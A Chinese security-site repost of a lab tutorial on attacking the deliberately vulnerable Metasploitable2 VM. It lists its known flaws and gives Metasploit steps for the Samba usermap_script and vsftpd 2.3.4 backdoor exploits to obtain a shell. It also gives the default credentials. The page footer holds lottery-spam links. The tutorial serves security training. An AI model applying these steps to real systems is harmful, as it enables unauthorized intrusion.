安基网 首页 安全 渗透测试 查看内容

Metasploit -- 攻击Metasploitable2靶机

2020-5-1 13:57| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 为什么年轻时都会颓废堕落一段时间,因为现实否定了我们内心的世界观。。。---- 网易云热评一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高 ...

为什么年轻时都会颓废堕落一段时间,因为现实否定了我们内心的世界观。。。

---- 网易云热评

一、Metasploitable2简介

Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。

开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。

下载地址:https://sourceforge。net/projects/metasploitable/files/Metasploitable2/

用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源码包后门漏洞

4、UnreallRCd后门漏洞

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破)

9、Distcc后门漏洞

10、Samba sysmlink默认配置目录遍历漏洞

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞

13、Ingreslock后门漏洞

14、Rlogin后门漏洞


三、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

攻击机:kali linux IP:192。168。1。133

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

2、搜索可利用的模块:search samba

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options

需要设置目标ip和端口(默认139)


4、设置目标主机地址:192。168。1。131

5、运行:run 此时已建立shell连接

6、查看目标主机目录文件:ls


四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd


2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要设置的参数:show options

需要设置目标ip和端口(默认21)


3、设置目标主机地址:192。168。1。136

4、 运行:run 此时已建立shell连接

5、查看目标主机目录文件:ls


禁止非法,后果自负

欢迎关注公众号:web安全工具库



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6821521169959617036/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
极速赛车是官网吗 极速赛车登陆 快钱彩票计划群 v8彩票计划群 内蒙古11选5开奖 588彩票计划群 彩宝彩票计划群 盛通彩票计划群 上海11选5走势 上海11选5走势